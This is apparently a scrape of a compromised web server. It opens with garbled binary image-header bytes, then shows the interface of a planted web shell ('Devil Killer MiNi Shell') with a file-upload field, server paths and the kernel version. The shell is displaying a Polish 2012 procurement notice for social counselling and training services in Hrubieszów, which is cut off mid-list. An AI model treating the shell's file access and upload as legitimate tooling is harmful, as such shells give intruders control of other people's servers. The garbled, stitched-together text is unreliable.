JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120619/133305-N-2012.html

<p class="kh_header"><b>Hrubieszów: Przedmiotem zamówienia jest realizacja projektu systemowego pt. Lepszezycie w ramach Programu Operacyjnego Kapitał Ludzki, zadanie 1 Aktywna integracja, pkt 1 Kontrakty socjalne</b><br>
<b>Numer ogłoszenia: 133305 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Bolesława Prusa 8, 22-500 Hrubieszów, woj. lubelskie, tel. 84 6965857, faks 84 6965857.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.projekt-lepszezycie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest realizacja projektu systemowego pt. Lepszezycie w ramach Programu Operacyjnego Kapitał Ludzki, zadanie 1 Aktywna integracja, pkt 1 Kontrakty socjalne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja projektu systemowego pt. Lepsze życie w ramach Programu Operacyjnego Kapitał Ludzki, zadanie 1 Aktywna integracja, pkt 1 Kontrakty socjalne. 
Zakres zamówienia obejmuje:
I. Utworzenie punktu poradnictwa psychologicznego dla 25 osób w lokalu na terenie miasta Hrubieszów, 
Spotkania indywidualne i grupowe z psychologiem w ramach projektu Lepsze życie odbywać się będą w okresie od sierpnia do 30 listopada 2012 r. w ilości 25 godz. w miesiącu, w dniu tygodnia ustalonym przez strony w godzinach od 8:00 do18:00 i powinny zawierać:
doradztwo psychologiczne w zakresie radzenia sobie z sytuacjami dnia codziennego,
porady psychologiczne w zakresie radzenia sobie w sytuacjach trudnych i kryzysowych,
wsparcie psychologiczne w rozwiązywaniu problemów bieżących,
diagnozę zasobów, umiejętności interpersonalnych, ćwiczenie zachowań asertywnych,
nauka sposobów radzenia sobie ze stresem, wsparcie dla wszystkich osób biorących udział w projekcie co wpłynie pozytywnie na ich motywacje do zmiany sytuacji życiowej (podniesienie wiary w siebie, we własne możliwości i umiejętności).
Każdorazowe spotkania z beneficjentami projektu będą opisane w indywidualnej karcie
pracy, która powinna zawierać zakres tematyczny porady oraz zrealizowanego zadania. Karta
pracy powinna być opatrzona logo projektu oraz podpisami beneficjenta i psychologa,
zawierać datę i czas pracy. Karty pracy muszą obejmować jeden miesiąc. Ilość godzin porady
indywidualnej na osobę określi psycholog po pierwszej rozmowie z daną osobą
(beneficjentem).
W miesiącu, w którym zostanie zorganizowany wyjazd integracyjny zostanie przeprowadzony  3 godz. warsztat z uczestnikami projektu w miejscowości, do której zostanie zorganizowany wyjazd integracyjny. Warsztat ten powinien być udokumentowany programem spotkania oraz listą obecności beneficjentów. Łącznie do wypracowania: 97 godz. porad w punkcie oraz 3 godz. podczas warsztatów wyjazdowych  tj. 100 godz.

II. Utworzenie punktu poradnictwa prawnego dla 25 osób, w lokalu na terenie miasta Hrubieszów, mającego na celu zapewnienie wsparcia wszystkim osobom biorącym udział w projekcie co wpłynie pozytywnie na motywacje do zmiany sytuacji życiowej (podniesienie wiary w siebie, we własne możliwości i umiejętności).
Spotkania indywidualne i grupowe z radcą prawnym w ramach projektu Lepsze życie odbywać się będą w okresie od sierpnia do 30 listopada 2012 r. w ilości 25 godz. w miesiącu w dniu tygodnia ustalonym przez strony w godzinach od 8:00 do 18:00 i powinny zawierać:
porady prawne;
wydawanie opinii prawnych;
inna pomoc prawna wg potrzeb;
działania zapewniające wsparcie w trudnych sytuacjach życiowych wszystkim osobom
biorącym udział w projekcie.
Każdorazowe spotkania z beneficjentami projektu będą opisane w indywidualnej karcie
pracy, która powinna zawierać zakres tematyczny porady oraz zrealizowanego zadania. Karta
pracy powinna być opatrzona logo projektu oraz podpisami beneficjenta i radcy prawnego,
zawierać datę i czas pracy. Karty pracy muszą obejmować jeden miesiąc. 
W miesiącu, w którym zostanie zorganizowany wyjazd integracyjny zostanie przeprowadzony 3 godz. warsztat z uczestnikami projektu w miejscowości, do której zostanie zorganizowany wyjazd integracyjny. Warsztat ten powinien być udokumentowany programem spotkania oraz listą obecności beneficjentów. Łącznie do wypracowania: 97 godz. porad w punkcie oraz 3 godz. podczas warsztatów wyjazdowych tj. 100 godz.

lokal, w którym utworzony zostanie punkt poradnictwa psychologicznego, poradnictwa
prawnego musi spełniać wymagania określone przepisami bezpieczeństwa i higieny pracy, i  musi być dostosowany do ilości uczestników,
zapewnienie uczestnikowi spotkania indywidualnego napojów gorących (kawa, herbata,
cukier, śmietanka) oraz napojów chłodzących (woda, sok),
karty pracy psychologa, radcy prawnego składane będą nie później niż do 5 dnia
następnego miesiąca. 

III. Zorganizowanie wysokiej jakości szkolenia w okresie od sierpnia do 30
listopada 2012 r., w lokalu na terenie miasta Hrubieszów, które ma na celu uzyskanie
kwalifikacji z zakresu:

1. Sprzedawca z obsługa kasy fiskalnej - dla  6 osób
Kurs powinien obejmować część teoretyczną oraz część praktyczną zawierające
poszczególne bloki tematyczne: 
	Aspekty prawne dotyczące teorii sprzedaży 
	Profesjonalna obsługa klienta
	Skuteczne techniki sprzedaży 
	Negocjacje handlowe
	Trening interpersonalny
	Obsługa programów komp. - sprzedażowych
	Obsługa kasy fiskalnej
	Przedsiębiorczość 

Kurs powinien trwać nie mniej niż 100 godz.. Na jedną godzinę zegarową składa się
jedna godzina lekcyjna tj. 45 minut i 15 minut przerwy. Wykonawca zobowiązany jest
zapewnić nie mniej niż 6 kas fiskalnych, w tym co najmniej 3 rodzaje kas. 

2.	Pracownik ochrony fizycznej - dla 8 osób 
Kurs powinien obejmować część teoretyczną oraz część praktyczną zawierające
poszczególne bloki tematyczne: 
	Przepisy regulujące zasady wykonywania zadań pracownika ochrony fizycznej 
	Wybrane elementy prawa karnego, cywilnego, prawa pracy
	Wybrane elementy psychologii
	Etyka pracownika ochrony
	Zasady udzielania pomocy przedlekarskiej
	Ochrona osób: przyczyny zamachu na osoby, metody i etapy ataków na osoby oraz używane środki, założenia taktyczne przeciwdziałania atakom, organizacja grupy ochronnej, itp.
	Ochrona mienia: ochrona obiektu, techniczne środki zabezpieczenia mienia, itp.
	Samoobrona i techniki interwencyjne
Kurs powinien trwać nie mniej niż 160 godz.. Na jedną godzinę zegarową składa się
jedna godzina lekcyjna tj. 45 minut i 15 minut przerwy.

3.	Kurs kosmetyczny z elementami wizażu - dla 4 osób
Kurs powinien obejmować część teoretyczną oraz część praktyczną zawierające
poszczególne bloki tematyczne: 
	Rodzaje cery i jej pielęgnacja, problemy skórne, sposoby radzenia sobie z niedoskonałościami cery
	Podstawy sztuki wizażu, analiza kolorystyczna
	Modelowanie twarzy
	Makijaż dzienny, popołudniowy, wieczorowy, fantazyjny, itp. - ćwiczenia praktyczne
	Zdobienie i pielęgnacja paznokci - ćwiczenia praktyczne
	Makijaż permanentny
	Przedsiębiorczość
	Trening umiejętności interpersonalnych 
Kurs powinien trwać nie mniej niż 120 godz.. Na jedną godzinę zegarową składa się jedna godzina lekcyjna tj. 45 minut i 15 minut przerwy.

4.	 Opiekun osób starszych  i dzieci - dla 7 osób
Kurs powinien obejmować część teoretyczną oraz część praktyczną zawierające
poszczególne bloki tematyczne: 

	Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka
	Podstawy psychologii rozwojowej
	Zasady i metody wychowania dziecka
	Rozpoznawanie i zaspokajanie potrzeb dziecka
	Gry i zabawy wpływające na rozwój dziecka
	Pierwsza pomoc przedlekarska w nagłych wypadkach
	Rola i zadania opiekuna osób starszych
	Zasady nawiązywania właściwych relacji z podopiecznym i jego rodziną
W tym kurs dla  kandydatów na wychowawców placówek wypoczynku dla dzieci i młodzieży :  organizacja wypoczynku dzieci i młodzieży, planowanie pracy wychowawczo - opiekuńczej, obowiązki wychowawcy grupy, zajęcia kulturowo - oświatowe, itp.
Kurs powinien trwać nie mniej niż 120 godz.. Na jedną godzinę zegarową składa się jedna godzina lekcyjna tj. 45 minut i 15 minut przerwy.

Wykonawca zapewni uczestnikom  wszystkich kursów bezzwrotne materiały szkoleniowe: 
bezzwrotne autorskie materiały szkoleniowe do każdego modułu, podręczniki z tematyki sprzedaży lub prezentacji, bezzwrotne pen-drive/pamięć USB,  segregator, notatnik formatu A4, długopis, zakreślacz, wzory dokumentów sprzedaży, koszyczek kosmetyków. Kurs powinien zakończyć się egzaminem oraz wydaniem zaświadczenia o ukończeniu kursu, który powinien zawierać bloki tematyczne jakie obejmował kurs.
Wykonawca przedstawiać będzie miesięczne sprawozdania zawierające postęp w
prowadzonym kursie, opis zrealizowanych bloków tematycznych, ilość godzin. Do
sprawozdań należy dołączyć karty pracy wraz z listą obecności podpisaną przez
beneficjentów projektu oraz sprawozdanie w formie elektronicznej (wraz ze zdjęciami) celem
umieszczenia przez pracownika GOPS na stronie projektu www.projekt-lepszezycie.pl.
Sprawozdanie należy składać u koordynatora projektu nie później niż do 5 dnia każdego
następnego miesiąca.

Wykonawca realizujący zamówienie zobowiązany jest przestrzegać nw. zasad:
 ustalenie godzin szkolenia z uwzględnieniem czasu pracy osób pracujących,
 kursy powinny być zgodne z obowiązującymi przepisami prawa w zakresie nabycia
kwalifikacji przez osoby dorosłe,
 program szkolenia będzie realizowany z wykorzystaniem standardów kwalifikacji
zawodowych i modułowych programów szkoleń zawodowych, dostępnych w bazach
danych prowadzonych przez ministra (www.standardyiszkolenia.praca.gov.pl) i
powinien zawierać 1) nazwę i zakres szkolenia 2) czas trwania i sposób organizacji
szkolenia, 3) cele szkolenia, 4) plan nauczania określający tematy zajęć oraz ich
wymiar, z uwzględnianiem części teoretycznej i części praktycznej z uwzględnieniem
bloków tematycznych,
 niezwłoczne powiadomienie Zamawiającego w przypadku nie realizowania założeń
kursu przez uczestników,
 aby zajęcia odbywały się nie więcej niż 6 godzin dziennie, w dniach od poniedziałku
do piątku, z wyłączeniem sobót, niedziel i świat,
 lokal w którym będą odbywać się szkolenia powinien: 1) spełniać wymagania
określone przepisami bezpieczeństwa i higieny pracy, 2) być wyposażony w
stanowiska szkoleniowe w liczbie dostosowanej do ilości uczestników szkolenia - po
jednym dla każdego uczestnika, 3) być wyposażony w pomoce dydaktyczne
dostosowane do szkoleń objętych zamówieniem,
 w dniach prowadzenia kursów zapewnienie dla każdego uczestnika szkolenia obiadu w postaci jednego ciepłego posiłku oraz napojów gorących (kawa, herbata, cukier i śmietanka), napojów chłodzących (woda, sok) oraz ciasteczek.
 termin realizacji kursów : sierpień - do 30 listopada 2012 r.
Po zakończonych kursach wykonawca zobowiązany jest do złożenia u
koordynatora projektu sprawozdania końcowego (ogólne z przebiegu całości szkolenia). 
Po zakończeniu projektu wykonawca zorganizuje spotkanie podsumowujące projekt, zapewniając catering( co najmniej 3 sałatki, wędlina, 2 rodzaje śledzi, ryba po grecku, koreczki, rolada warzywna, chleb, ciasto, kawa, herbata oraz napoje zimne w ilości nie mniej niż 10 dkg każdego produktu na jednego uczestnika). Przewidywany termin spotkania: grudzień 2012 r. Szczegóły spotkania należy uzgodnić z Kierownikiem Gminnego Ośrodka Pomocy Społecznej w Hrubieszowie. 
Koszt szkoleń obejmuje w szczególności wynagrodzenia kadry szkoleniowej i obsługi,
materiały szkoleniowe, zabezpieczenie sal wykładowych i innych pomieszczeń, obiady,
serwis kawowy oraz inne niezbędne do przeprowadzenia szkolenia.

IV. Zorganizowanie wyjazdu integracyjnego poza miejsce zamieszkania w formie
3-dniowych warsztatów.
Warsztat będzie obejmował zajęcia z psychologiem, radcą prawnym i 6 pracownikami socjalnymi - środowiskowa praca socjalna, którym wykonawca (realizator projektu) zapewni dojazd i pobyt.
Z wyjazdu szkoleniowego należy przeprowadzić ankietę ewaluacyjną, którą
opracowuje wykonawca a zatwierdza koordynator projektu. Sprawozdanie z wyjazdu wraz z
załączonymi ankietami wykonawca dostarczy nie później niż 7 dni roboczych po
zakończonym wyjeździe. Do sprawozdania należy dołączyć karty pracy, listę obecności
podpisaną przez beneficjentów projektu, czas pracy oraz sprawozdanie w formie
elektronicznej (wraz ze zdjęciami) celem umieszczenia przez pracownika GOPS na stronie
projektu www.projekt-lepszezycie.pl.
Przy wyborze miejscowości należy uwzględnić miejscowość zarówno atrakcyjną
turystycznie jak również dającą możliwość poznania twórczości regionalnej oraz pogłębienie wiedzy zdobytej w trakcie kursu przez uczestników projektu Lepsze życie -
wymiana doświadczeń - zajęcia warsztatowe w atrakcyjnej miejscowości - wymiana doświadczeń-szkolenie

Termin: sierpień - do 15 października 2012 r.
Trasa: Hrubieszów - miejscowość atrakcyjna turystycznie - doświadczenia społeczności lokalnej w zakresie obejmującym kursy.
Czas trwania zajęć warsztatowych: 3 dni (piątek, sobota, niedziela  lub sobota, niedziela, poniedziałek),
Przewidywana trasa: nie więcej niż 1500 km / tysiąc pięćset  kilometrów/ w obie strony
- ilość uczestników: 25 beneficjentów oraz 6 pracowników socjalnych, koordynator projektu, kierownik GOPS,  którym wykonawca zapewni transport, zakwaterowanie w pokojach nie więcej niż dwuosobowych, ubezpieczenie wszystkich uczestników, wyżywienie:
 pierwszy dzień: obiad i kolacja
 drugi dzień: śniadanie, obiad i uroczysta kolacja 
 trzeci dzień: śniadanie i obiad
 podczas zajęć zapewnienie przerw kawowych (napoje ciepłe, napoje zimne, kruche
ciasteczka, lody),
zorganizowanie czasu wolnego dla uczestników połączonego z atrakcjami (między
innymi zwiedzanie atrakcji turystycznych w pobliżu miejsca zakwaterowania lub alternatywnie inne atrakcje turystyczno- rekreacyjne w przypadku niekorzystnych warunków
atmosferycznych.
Łącznie 33 osoby.
Program powinien obejmować:
 jeden dzień warsztatów powinien zawierać trzy godzinne zajęcia z psychologiem oraz   trzy godzinne spotkanie z radcą prawnym następnie czas wolny;  
 jeden dzień warsztatów - zajęcia praktyczne w zakresie poszczególnych kursów - metody prezentacji połączone z wymianą doświadczeń społeczności lokalnej nie mniej niż 6 godz.;
 jeden dzień warsztatów spotkanie z 6 pracownikami socjalnymi w ramach pracy
socjalnej (po jednej godzinie dla każdego pracownika). 

Wykonawca zobowiązany jest do udokumentowania warsztatów w formie papierowej oraz w
formie elektronicznej wraz ze zdjęciami i przekazania dokumentacji Zamawiającemu.

Zamówienie realizowane będzie w okresie od sierpnia 2012 r. do 30.11.2012 r..
Zgodnie z art. 36. ust. 4 ustawy wykonawca zobowiązany jest do wskazania w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Określenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień CPV:
80500000-9 - Usługi szkoleniowe
80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego
85312320-8 - Usługi doradztwa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności i czynności; 
	Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca przedłoży do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 1 oświadczenia) wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia; 
          tj. wykonawcy, którzy w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zrealizowali co najmniej jedną usługę  odpowiadającą swoim rodzajem przedmiotowi zamówienia, podobnym charakterze (szkolenia, kursy przeprowadzane dla osób korzystających z pomocy ośrodków pomocy społecznej) o wartości nie mniejszej  niż 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych) brutto każda  i posiadają dokument potwierdzający, że usługi zostały wykonane lub są wykonywane należycie;
	Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca przedłoży do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 2 oświadczenia) i dokument (wykaz wykonanych lub wykonywanych usług - wypełniony załącznik nr 5 siwz), który zawierał będzie co najmniej jedną usługę, spełniającą powyższe kryteria oraz dokument potwierdzający, że usługi zostały wykonane lub są wykonywane należycie - wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem  technicznym;
- dysponują co najmniej dwoma pomieszczeniami, położonymi na terenie miasta Hrubieszów umożliwiającymi przeprowadzenie kursów i spotkań (porady prawne, porady psychologa). 
   Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia) - wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobami zdolnymi do wykonania zamówienia, tj.: 
 - dysponują co najmniej jedną osobą posiadającą uprawnienia radcy prawnego;
 - dysponują co najmniej jedną osobą wykonującą zawód psychologa;
- dysponują co najmniej 2 osobami uprawnionymi do przeprowadzania kursów:  sprzedawca z obsługą kasy fiskalnej; pracownik ochrony fizycznej; kurs kosmetyczny z elementami wizażu; kurs -opiekun osób starszych i dzieci; (tzn. 1 osoba  maksymalnie do dwóch szkoleń);
   Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia) i dokument (wypełniony załącznik nr 4 siwz - wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej;
	 Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 3 specyfikacji istotnych warunków zamówienia - pkt 4 oświadczenia) - wg zasady spełnia / nie spełnia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
